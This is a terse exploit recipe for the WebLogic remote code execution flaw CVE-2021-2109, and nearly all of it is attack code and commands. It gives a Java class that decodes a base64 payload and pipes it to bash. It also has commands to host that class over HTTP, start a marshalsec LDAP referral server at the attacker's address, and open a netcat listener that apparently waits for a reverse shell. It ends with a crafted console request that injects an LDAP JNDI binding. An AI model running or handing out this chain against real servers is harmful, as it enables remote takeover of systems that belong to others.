CVE-2021-2109 Weblogic RCE

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;
public class Exploit{   public Exploit() throws Exception {       //Process p = Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});     Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo'base64编码'|base64 -d |bash"});       InputStream is = p.getInputStream();       BufferedReader reader = new BufferedReader(new InputStreamReader(is));
       String line;       while((line = reader.readLine()) != null) {           System.out.println(line);       }
       p.waitFor();       is.close();       reader.close();       p.destroy();    }
   public static void main(String[] args) throws Exception {    }}

python -m SimpleHTTPServer 80

java -cpmarshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip.ip.ip.ip/#Exploit 9998

nc -lvnp xxxx

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://x.x.x;x:9998/s4dzak;AdminServer%22)